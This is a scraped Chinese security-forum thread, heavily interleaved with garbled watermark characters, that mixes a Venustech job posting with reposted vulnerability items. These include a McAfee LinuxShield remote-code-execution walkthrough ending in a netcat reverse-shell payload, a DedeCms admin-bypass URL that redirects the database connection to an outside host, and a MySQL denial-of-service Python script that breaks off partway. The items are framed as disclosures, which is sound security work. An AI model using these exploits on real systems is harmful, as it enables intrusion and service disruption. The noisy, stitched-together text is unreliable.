最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    8 X; T, _; ]" S  P. M
    7 Z5 h" x: P/ y

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.% E5 q1 M# ^0 ?: T  k3 T
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.6 Y4 ~4 m9 t& L8 ]6 i; {1 E
    精通C语言编程

    2.
    & ]6 M* Y' b# T2 h1 K1 o, v  `熟练使用Linux操作系统,精通 Linux下C语言编程

    3.$ H$ |( |/ W# p" _" G
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    " b( a& `6 K2 y4 T熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    : n" S, P; G0 q! s) |! ^熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.; k& x4 h5 x: ~, F) g4 H8 o9 R% y' Y
    负责产品的系统测试、集成测试工作

    2.  ]  P8 S9 T+ h3 G
    负责产品用例的编写,执行、修改

    3.% ?# I/ i- T7 n8 h) D' K4 v! }/ N
    负责产品性能的测试

    4.
    6 ]6 i  f  x8 h" |4 `! S负责对外项目的支持和测试工作

    岗位要求:

    1.
    $ U. n1 K% o% R/ t# `  t掌握基本的tcp/ip知识

    2.
    . Y& Y9 m4 t+ i6 ~+ H: G数通基础好

    3.
    5 I2 u% V6 E" K8 i7 ]4 T0 g0 I对linux有一定的基础

    4.3 e% b+ v! {8 ~, {, E! w
    掌握数据库的搭建和使用

    5.; c- x; y) ~1 D9 Y
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6., z0 |; I# |- N* [) n  D* c
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.0 T; }! x2 k0 }7 a( M/ I1 n8 g$ _
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.2 v- r$ F+ A8 Q6 k
    对网络安全设备在网络中的部署有一定的认识

    9.1 z% @7 w' h1 k- x4 V  r$ u
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.0 Z: p( P# a- q
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    $ F' [& ?5 F, k# N3 G
    对服务客户的技术支持

    3.
    3 o, V: ?7 [& _7 J4 W
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    ) f& h) @0 }1 G- S! z( y
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    ) N( R* A0 j5 O1 @. ]; }/ Z
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
      l1 }. m# s' y8 H" s影响版本: McAfee LinuxShield <= 1.5.1
      N) i) c; N2 [2 {远程攻击: Yes
    . W: [( v# z" L  N' \  m本地溢出: Yes! p0 L3 W% J" @. a
    背景阅读:: v3 I- R* t4 K2 {2 Q  M
    ===========
    6 P: f8 }# w7 H7 q* }$ D5 q
    , v: Z4 S2 v! u' U6 O& c* yLinuxShield detects and removes viruses and other potentially unwanted
    7 ^; t' m( B1 k7 B% {; Esoftware on Linux-based systems. LinuxShield uses the powerful McAfee, g6 H8 y( ]( X" \, }: E1 b
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our3 i4 }, a. }/ v$ Q$ O7 s1 Z
    anti-virus products.2 ]# [' P0 t8 d+ M) I/ Q" e

    3 j& _8 k& |, u) d3 bAlthough a few years ago, the Linux operating system was considered a4 L. I9 C, s$ b/ }
    secure environment, it is now seeing more occurrences of software
    3 t* u: n, V' H9 C" `4 j0 \specifically written to attack or exploit security weaknesses in
    - {9 s4 g8 w- T: L* o& DLinux-based systems. Increasingly, Linux-based systems interact with
    7 V1 X: M# e  S5 i6 MWindows-based computers. Although viruses written to attack Windows-
    " ?/ T( a4 ?$ f, t% x2 Q; Tbased systems do not directly attack Linux systems, a Linux server* M. G. ^6 ?. @, A" ^4 H2 \
    can harbor these viruses, ready to infect any client that connects to
    + T  D# B& Z8 Q% m0 Q! P  F0 yit.
    # r; V4 e! N/ p( B  Z4 L8 j. P2 V7 z5 a" {: A
    When installed on your Linux systems, LinuxShield provides protection& y0 R/ r( V, Z$ [2 i5 n
    against viruses, Trojan horses, and other types of potentially  t( p- y1 Y. V$ l% o& R
    unwanted software.
    & M0 ?' B8 U7 d! t% w- _! ^9 X, Y! w6 F& z, _" Y2 J
    LinuxShield scans files as they are opened and closed! N* t' T3 y  `* w& w9 @% n7 @
    ?&amp;#65533;&amp;#65533; a technique7 D/ G3 d& b+ q/ |: L, K. N
    known as on-access scanning. LinuxShield also incorporates an
    / S% P. y( k0 B  D9 i  Y8 Von-demand scanner that enables you to scan any directory or file in; w5 N6 Z( J# x& K
    your host at any time.* R5 ?8 `/ [: c% F) F; A

    & e; O) s+ Y* h# kWhen kept up-to-date with the latest virus-definition (DAT) files,3 C- e. R+ W, e  S! c
    LinuxShield is an important part of your network security. We! P5 g' W- k2 j+ c
    recommend that you set up an anti-virus security policy for your
    8 x# M3 K9 Z( n$ _6 Inetwork, incorporating as many protective measures as possible.
      Q, ?4 p! V; O% a: J/ W* m4 v$ T: G4 W  K$ \( L
    LinuxShield uses a web-browser interface, and a large number of
    , p5 L4 B  }! b& zLinuxShield installations can be centrally controlled by ePolicy% H8 Z" T3 f4 `! R6 m* X% ^
    Orchestrator.7 v, `6 b& S- m: \" K& h

    7 k$ d, f1 T6 b1 g* t, t(Product description from LinuxShield Product Guide)+ l3 ?$ v- K4 i/ ?, [* j9 [
    3 I3 X+ \4 O' v: N# Y

    * k% ]- K; n3 M; k" b: n- I
    4 N% t1 u/ y+ @Description:& `, G6 \( n. V2 B
    ============4 h$ d- H7 X' x; o: p' b. c$ R  P
    # e4 ?7 T8 n" P; t' z3 f
    This vulnerability allows remote attackers to execute arbitrary code/ G: }4 J2 k+ O. `+ B
    on vulnerable installations of McAfee LinuxShield. User interaction! Q( V) Y9 |1 t
    is not required to exploit this vulnerability but an attacker must
    , L5 V  w/ X7 L) L, T5 H% Tbe authenticated.1 E& o# O' T2 ^6 |- A+ R9 P
    0 S% }" q& U2 o8 x
    The LinuxShield Webinterface communicates with the localy installed
    # A) n% \! S) T+ k"nailsd" daemon, which listens on port 65443/tcp, to do
    # G* p& o  U8 l, V# p# Tconfiguration2 @! @8 Y$ w( ?# T6 w' _+ H2 \
    changes, query the configuration and execute tasks.
    . z4 e0 }* L' j& U7 N
    - \+ q6 z: D4 DEach user, which can login to the victim box, can also authenticate- [9 u' F, o9 n) C
    it self to the "nailsd" and can do configuration changes and' l3 w+ j/ r) `7 p& n0 a
    execute
    0 M  U& z: j  B% Y( g- w7 i- stasks with root privileges.1 A, X+ c& o; P: T( Q! T. C

    8 h4 k  g9 i7 j6 ]! [4 vA direct execution of commands is not possible, but it is possible to
      B# u; h- a# C" ~, \download and execute code through manipulation of the config and
    ) r1 y, e( S* `execute schedule tasks of the LinuxShield.9 n, b. C4 n. d& n

    ) m+ y: o- g* u1 X& J! `3 I# v7 _. d) U7 n" o  z4 P: s' Y
    walk-through (after the TLS handshake):
    " N* o7 I, Q8 C; A/ l5 q+--------------------------------------$ ]9 L! r9 k# D/ J
    $ r( c2 I& ?8 o
    nailsd > +OK welcome to the NAILS Statistics Service4 Y' p, n2 G" \$ X# m
    attacker> auth <user> <pass>  U- K2 D# z& m9 r8 Z
    nailsd > +OK successful authentication2 n) y! ]" p3 @7 L" S

    6 t' [$ x/ S! h" U! P  p7 L: U# Set the Attacker repository to download our code from a httpd+ F, P9 [3 ?8 ~) F2 r
    # (catalog.z)
    , r2 J' @+ }- y+ F- ^, C6 R- w#---------------------------------------------------------------0 ~' [$ S4 p. Q# h( n5 I' O
    attacker> db set 1 _table=repository status=1 siteList=<?xml version2 o' [9 R, D* z: @+ u
    ="1.0" encoding="UTF-8"?><ns:SiteLists% R* }) L: e3 D
    xmlns:ns="naSiteLi
    : A' J; }: R5 D; D2 v: cst" GlobalVersion="20030131003110"1 t# E4 Q( v; @: T# m4 W
    LocalVersion="20091209
    + d2 E! c- ~6 v3 h0 F6 P& ~161903" Type="Client"><SiteList* c5 ^* T$ l  M% x* }" n7 P% w
    Default="1" Name="SomeGU
    # I6 X$ v! ?8 z) tID"><HttpSite Type="repository"
    8 g2 H: g2 r- TName="EvilRepo" Order="1
    7 |( A4 A" J% `! ?! t/ v1 L# p" Server="<attackerhost>:80"* O/ R' Q2 n8 I* y3 G% k( Q
    Enabled="1" Local="1"><Rela) N( u& o2 f& i. g2 ]

    8 o1 K; s5 Y' i, FtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use  w+ K" l4 O4 s' W
    rName></  K, C- ~9 S2 m( O
    UserName><Password% T) E, e3 @6 Q8 ~' U+ ?
    Encrypted="0"/></HttpSite></SiteList></! x4 H# N% x$ R7 U& O: Q, A
    ns:SiteLists> _cmd=update
    # x  ?* ]) n- q9 unailsd > +OK database changes buffered.
    0 @! k% S# k; h5 W4 L4 P
    / G% ^, f  N! O6 [  ]# d& P7 k9 k# Execute task to set the attacker repository
    0 u1 B5 X) h, J, x#---------------------------------------------------------------- _, U( L- H, [! E% b# O4 g5 i
    attacker> task setsitelist
      K9 J( c7 [2 f: _7 C; \nailsd > +OK setting sitelist from CMA.; N5 G2 S9 m: H& K
      l6 n0 L, B$ S5 O: B( P
    # Execute the default Update task to download the code& t6 R8 D  ^$ u/ {" O" F  ]
    #---------------------------------------------------------------
    1 H+ q4 e& k; B, ?$ X* a& C& s  battacker> task nstart LinuxShield Update
    9 A. ^$ X- \* `1 G& pnailsd > +OK task LinuxShield Update starting, |% i' D* [6 a9 R- @
    . ?2 o2 X+ D3 x) o" o4 ?
    # Create a Scan profile, which executes our code. The profiles are
    : @& `/ y% w) r3 F2 L5 d( u# not stored in the database.) w7 k9 f/ M' G
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    5 o  }/ s# x5 \' m#---------------------------------------------------------------
    1 G5 d' b) ~+ H) L; }attacker> sconf ODS_99 begin6 b9 |5 m. D9 T3 H; ?" I( D, _
    nailsd > +OK 1260400888
    9 A7 b/ u+ d9 c* z- g. `! w" M9 b& ?" M" ^. M! d* c4 H+ w3 I* d
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    & |+ \7 ^- \' s+ n" Vpath2 s4 r5 i; ]7 k
    # where our earlier downloaded catalog.z file is stored.8 c9 S- S& w9 z$ B
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    6 c3 g. r+ `# ^! j#---------------------------------------------------------------/ y3 w& X0 O( n5 @. ?
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=! m) V# [6 y" M2 ~: d
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O; X$ E! D0 m. H; Q( |. ?7 w
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=, n, p4 [4 T+ e/ \/ R$ {
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    1 W% A# e, G7 J2 w3 k3 M3 Eine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    2 r0 ]0 E/ b2 U" F. b. tfile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    + [' d% t8 l( mir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en# [" K. ~# U$ I, w( d/ x% b# a3 w
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd' _1 V% n& R8 h& t8 {$ a
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu: r( I" ^) V  `
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru2 p( w" M8 F% Q* ^" j( X
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99$ H& M+ U! `9 G7 Z  ]
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    7 E2 b( k  L) }+ w9 H7 yle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil: J& |$ r( W* w+ `' B
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    , }5 D# U) u2 e0 X) v" be nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr9 `: M" H& t8 j
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    ; L7 o) x8 i* C  x- S3 ~- Oo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile# C2 t; X- R7 w3 ~% p2 l
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t% T/ a* n- X  U. t8 x- b
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    5 H6 Q- p% H% Och/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100% N. M8 E% ?( J/ o5 B9 ~
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    % E, v7 {$ f2 C# \; d7 C+ qODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil3 ~0 O, l& U, C3 c. k& I
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    / I# x! g$ n/ p$ f1 [6 d) nnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr! O& @5 T1 W$ l8 M" Z
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil2 _3 s9 z' A6 r7 ]9 L
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    % V7 X- p  v! v.action.Default.secondary=Quarantine nailsd.profile.ODS_99.7 {% u) t# p3 Z6 l
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    ) f' y8 Y# a( h) f3 Lecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa0 t$ i7 i( w& G2 S
    ss nailsd.profile.ODS_99.action.error=Block
    0 v6 \+ F7 \# j8 a* Q. lnailsd > +OK configuration changes buffered
    ) g! X9 @, X+ `8 P2 ?) N- wattacker> sconf ODS_99 commit 1260400888
    * u( v. h% {0 T% xnailsd > +OK configuration changes stored: G9 C; B9 m8 S) t/ {4 [4 ~2 r- _

    2 g: r# b( i6 w$ h' R( t# Set a scan task with the manipulated profile to execute the code4 y1 B% s' |& V2 h5 V) L: y" |
    #---------------------------------------------------------------/ v& S( Q' y& ]9 M
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    & X0 ?  s: V2 Zpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    ! o* U) }* Y3 r. _, Q0 `3 e) Imp;exclude:false timetable=type=unscheduled taskResults=0 i& p( M0 s- X8 D. b) U! B
    _lastRun=1260318482 status=Stopped _cmd=insert
      D5 r: k/ ]) G4 e+ |1 o0 v$ rnailsd > +OK database changes buffered  N6 z& h! R3 R$ d
    6 b; ]5 O' [4 O8 ~0 U$ ~6 Z
    # Execute scan task to execute the code
    5 J0 v+ m! L7 n# Q#---------------------------------------------------------------
    1 {1 m( J- P7 N6 q" d( Sattacker> task nstart Evil Task
    8 p, S: t' Z- F) e9 S- Y3 K. G
    % d" |* J! c0 ?5 d3 h0 H- \+-------------------------------------- walk-through EOF
    1 I# Z* n# k3 n2 G$ {2 A2 `! {: R+ P! S

    ! D2 d& L7 n+ ?$ `8 ^& pTo get a reverse root shell place something like this in the catalog.z
    9 c8 b" B; t$ z9 ]/ c2 G! d+ q  t4 G$ Z8 a7 |+ o5 Y
    --- snip ---9 r+ E+ U% t6 J) o5 [
    #!/bin/sh
    # H3 [  O3 X+ Y. w1 ?8 b3 ~7 rnc -nv <attacker_host> 4444 -e /bin/sh% c) r* l- Q2 p  ~1 w
    --- /snip ---
    + q# |- a9 _, _. C; Y5 q' c' I/ I3 Z+ `2 h' {( f$ q3 H! X" g
    + \2 m" S* |4 U4 ~
    3 w2 T, c( S/ Z: ]1 Q8 R- s0 E0 d6 c- B
    Proof of Concept :4 v+ \! d  b2 i  ~, L2 [/ H
    ==================
    , E# O; h( ]+ @: f
    / B; ~; L% Z3 l* uhttp://inj3ct0r.com/sploits/11165.tar.gz% V) i3 y8 l$ r( x& [/ ]

    # d- E3 J6 I8 R& ^8 n5 i& \" i4 T) I
    8 f4 |/ {0 D& T7 w" s. B2 D' C, X
    Solution:% v& |* q6 b: d6 T# v3 @. Y9 q
    =========
    ! R$ G5 f; J' @+ B9 d: Z
    ; d6 a2 b4 B+ S7 EMcAfee Advisory* I( I( U+ ]  C$ ]0 m5 m8 z
    +--------------
    * u& H, u4 y' g  X* P, J% Mhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    ; T, q- z- \  H- y) i" Y2 ]& p% l/ k  C/ r! G
    & n2 L5 G# w5 E+ c% f: s. H- t

    - Y+ n! a) \! y, w" G# ^$ tDisclosure Timeline (YYYY/MM/DD):
    0 B7 u' C1 ~* w, J3 }=================================) k* b  P; L! R
    % r1 y" K9 a/ j; J
    2009.12.07: Vulnerability found
    4 L- l2 a$ L" P2 Q: s2010.02.03: Asked vendor for a PGP key
    ' ^; b, H$ H+ k# o- [' T2010.02.05: Vendor sent his PGP key* @1 c2 T  N/ `; _4 ?
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure# [4 h# m( M% F0 A/ V! k9 ?
    date (2010.02.18) to Vendor
    5 K2 B' J. f% `2010.02.05: Vendor acknowledges the reception of the advisory
    4 c; \8 d3 x4 U! m( A2010.02.16: Ask for a status update, because the planned release date is; R3 t# O, f( [) o0 a7 c
    2010.02.18.8 K* G7 _$ u4 w2 @$ n/ U8 o
    2010.02.16: Vendor response that, they are currently working on a patch
    # f. L5 a0 V" v0 B$ {2010.02.17: Changed release date to 2010.02.25.
    ; r1 I$ |1 w- x. r2010.02.22: Vendor gives a status update, that they are able to release3 T# r" n6 c! j% L7 k' _* g
    the patch on 2010.02.25.
    : X' H% q" a( e4 b% |, p  {2010.02.24: Ask for a list of affected products and the advisory url.
    3 `% ]4 b9 C& j# ]7 Y7 a5 m2010.02.24: Vendor sends the list.
    $ X8 z5 M' k8 }+ m2 b2010.03.02: Release of this Advisory
    7 `0 [' M: P% e8 l
    - J& E+ q8 v4 P3 |& z+ s
    + t  i" X+ r; a# q. f, R+ ?& c% [$ s0 k7 x
    3 _" m( ^+ ~; X" q- [5 y
    " z' J- h8 B- }, N, r1 E: ~( k
    ! k6 S) ]$ i, }0 e

      }% w8 L- E8 v# n
    4 w0 j7 Z0 W  S+ R3 i8 ~! u5 _  G% ~! |" a4 I! I9 Y

    : N2 `- E; {" n) p# }7 c: v0 y7 l( I0 V- Q& V
    3 Z# P3 T1 u' e1 Q- E( q
    5 G) m  I4 p- C3 i  t
    3 u" I* G' k$ U6 p$ f: c

    " ]; I2 q/ }/ b, Y+ E; n. K0 }; c* }4 a- ~
    $ m. L7 Q, {- Z

      B  Z; @2 v! J( w& H
    9 d7 Q( {2 m( F! X, n
    $ [& v. H, e/ v9 I& q7 l
    5 j+ ?# L7 @/ a& H9 z* }公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    # D) d( B( g' g
    影响版本:8 q- |4 c5 G3 `8 C
    Django 1.2.5
    & l, I9 Q' P, d4 n+ N) U8 LDjango 1.3 beta 1
    ; b. v$ [4 A: X  m0 cDjango 1.2.4) z% E; j" w) ^
    Django 1.2.2
      M* Y- ~0 }7 u5 [Django 1.2

    5 X* r0 S/ i2 {, l6 ]& v0 G0 Y0 q2 Z
    漏洞描述:
    & s6 q3 Z2 w. p: C
    Django是一款开放源代码的Web应用框架,由Python写成。
    " \( U4 ^1 P3 H. S. {5 k/ BDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    & S+ Z7 z' b$ t9 g/ B1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    5 ^4 z0 \( {. w# l9 @2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。7 A/ l/ ~5 r( }4 w% L
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。5 C9 H/ k" }$ ~9 ^; E1 R
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    " U% r& j$ n- L7 ~% m7 \) E
    细节参考:
    8 _4 G# U* X! i& u4 T, ^% C+ U9 ohttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    4 X5 h3 e1 T8 o, f* w! `3 }http://secunia.com/advisories/45939/
    , d: Z! e0 Z  V

    : n- h$ Q4 X+ q. P6 K# P5 J; z5 g4 g6 ]* N! @$ B, D4 H

    7 ~5 N& L7 b, ~2 j
    % b) M6 w- ]( N% u3 d4 I
    % @3 W  e. y7 U/ Z- b; J1 o; o, @) e9 H$ Y2 V+ ~
    ) ]1 f1 j7 E- w  N' l; ]

    + L3 u, c5 ?0 ?9 E  ^" H# l3 u% o/ r

    7 _) J$ f; O# D9 T2 P1 q: o9 `6 O, T! k5 {. E/ c5 ?

    , f3 a$ Y  Q: M
    9 ?! T+ p5 ~( v6 Z/ q2 j) j8 @, x4 n

    $ N: A3 r) _+ M# X0 E0 @" p  f6 l0 K9 A" x$ x8 q

    * m8 j" x' M: i; F1 _* x: J, v  C/ K# q  @) V; |1 x, `; h* _

    5 T1 [& g4 [) J5 H( s8 Z公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    " k+ E& j8 X  S) m( s" P& j- Q& h% x
    http://www.sitedir.com.cn/video/8.swf[/quote]9 D7 a  v9 a' _" O- w
    0 D! y0 W+ D7 q' Z' d

    / B& O3 X5 p8 ]
    5 x5 ?' H2 G6 v0 g  d  B
    " h& w# E( e' k- D# E% R5 p: f) a' S# B8 Z; j) q
    * `) A; x. ]  R% ]+ ]& N, Q: c
    $ ]9 e6 ^& r! [" N, M6 \
    # w! R; {+ Q/ v8 E6 X$ J0 N# z3 B

    2 |. {5 x$ f4 j2 z% C2 n& P7 p- K9 v  k! ?& s. n7 |4 b$ \

    + W2 Y( s3 V/ S5 _3 l( U! Z0 Q2 N9 b. n
    + `: u& H; W1 q, f. w
    0 X4 @9 ?: w; w4 H- _5 A3 j  e4 F

    1 `' B' M: n3 j; ]$ j% P9 J
    ! E  _( \8 H% C; H6 v. Y3 E  s- A

    4 R" K, _0 a% N7 ]公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    / D/ Z; M' ^: a- l  g; u% l
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    1 b' c9 ^9 }) Y/ r
    此漏洞的前提是必须得到后台路径才能实现
      T& v$ n6 Z) A: n% A- V
    官方临时解决办法:

    8 }8 x% ?* ?/ K. e# l; m/ r1 r
    找到include/common.inc.php文件,把:
    3 g2 d2 U9 ~, o5 l1 ~& X. A: M
        foreach($_REQUEST as $_k=>$_v)& B) F2 x$ t; W* D
        {$ L/ c$ D( {% ]; S( _5 Q& e
            var_dump($_k);/ F6 H4 w7 T. r# N
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    - ~& ]) R& I$ z$ c2 L( H! R; c' A3 u        {5 Y7 N3 x( y& x1 t
                exit('Request var not allow!');; G8 {, o7 [5 `$ b& H
            }3 I/ h+ s5 P! N! ~% S1 B
        }
    ; n; M9 _9 e) ]( d' K! n
    换成:

    ! W; X  v8 R4 @$ w
        //检查和注册外部提交的变量- y3 Q4 t3 c' V1 v$ K; Z8 W8 ^
        function CheckRequest(&amp;$val) {
    ( N/ N8 X. R8 n3 |# _1 x        if (is_array($val)) {$ f: X% W+ z9 f) H  G* c
                foreach ($val as $_k=>$_v) {9 R2 Y+ s& M0 ~9 S8 N
                    CheckRequest($_k);
    # I2 b& u* J. e1 T0 V/ z                CheckRequest($val[$_k]);
    2 G4 c2 K- p+ O0 T2 S% T* d            }
    8 j) ^. t4 D5 F3 T' N! E  n9 N        } else" k! e1 ]* {& t* U3 J1 n# B
            {5 h5 H  I2 K3 \4 z& i' U
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )5 C- z: [$ u. {6 J6 P: n
                {5 N& c1 l$ Q, ]) |& S
                    exit('Request var not allow!');
    3 V% M* r; \$ M9 ~7 b8 m+ N            }
    8 q* N7 Q1 U) u9 |# C; L0 c8 U        }: c0 @( w# \. C. W5 `7 x
        }% S$ z' A+ t" o: b2 v+ K
        CheckRequest($_REQUEST);
    & H: I8 ?4 K; l1 J$ H

    5 F4 b# ?, w1 h  o2 e) Y) M- x0 N! {- G# s; K

    ( R( _1 g4 j( L. [, [. {# {
    8 @% x3 v% j, x3 O8 \) q% ]
    3 R8 b6 B& W- Z4 v% \
    * U" M) w$ c! _2 |. Z: U% x" e3 h4 l4 p, L

    - c! z4 O7 Q" b
      y' R+ T# V- u4 _* Z+ w6 j$ M; T8 ?) g2 z( Z

    $ j1 @: K$ U' h- p- r% Z* T4 H4 E8 v* Q' M& N3 T9 m8 f

    ) s' c. [) P* v% }1 |  E. i
    , E" K% {& K8 p8 X8 i# }! G
    1 t! V! q9 i- u$ l% Z, C7 c% ~, U. S+ z' N& P
    " o# E. P4 h. N2 l  h
    ' s  E1 R% b* Q+ O! O

    * y& J9 s9 m  t& t公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机
    6 Y& w& Z- C! e' z
    http://www.sitedir.com.cn/video/4.swf" i: A3 u- [3 A, F, i# n
    % [9 R8 z+ A4 R! d
    ' c: N! H& k! ]% `# f' `4 G
    $ k5 z  j. p; G! ^2 l4 m9 ]
    . z3 j+ }! @, @) e+ v6 h
    % B- h0 ]5 \$ T. ^5 {: y  h5 }/ n
    4 {3 C' j# ?, Y; j. [# ?/ ~( h
    ; ^  U9 i; g, q
    ! N, d; h: {5 q- K3 p

    5 k1 G! N8 p# v) k
    % U6 f& L8 u1 ~, |  |
    / G1 e9 G' J9 E& p* o" T# j- e# J- O* g- _+ Q% Y' |2 \
    + S. [2 E4 [2 B1 e
    5 I! X& f6 F: Z5 J  ?
    9 {" m3 C1 Y$ R: j4 b- S

    / B% s6 e3 s; V' @, e
    ; I/ W' _( W7 U' L/ U
    3 }& g2 [2 ?, k公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    ! g) L# b# I" f$ r . ?9 n/ L% I, @9 {3 ]
    print "
    . |! d/ v9 U- c0 N! z: g". P) g3 Q' S& U" i
    print "----------------------------------------------------------------"
      K; c4 [: n) {- rprint "| MySQL 5.5.8 Null Ptr (windows)                                |"1 J# H% t" \, G* w! I# ^8 R: K
    print "| Level Smash the Stack                                         |"
    ; U9 i. X) c9 B* s, I* S+ l; yprint "----------------------------------------------------------------"
    4 }  L) B2 c2 rprint "& m' g0 `7 s2 a3 Q; b
    "6 M" y+ ?3 ?! Y  l

    ; L6 ?4 S* A) {, Gbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"* U" A% k! p# y* }( }: v' P
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    5 G( C/ l- i. ?2 B: M 4 a- _7 O4 _7 X; P
    buf2=("x11x00x00x00x03set autocommit30")4 [3 P4 F0 Z- T: D; H
    , m# F2 h& F1 y# ?# Q
    def usage():+ @) Z. C6 |% F! D" x
    print "usage : ./mysql.py <victim_ip>"
    0 a2 i8 c2 W3 m/ t" [; Rprint "example: ./mysql.py 192.168.1.22"
    ! v+ @1 o4 Z5 x1 s/ c5 o0 z" I
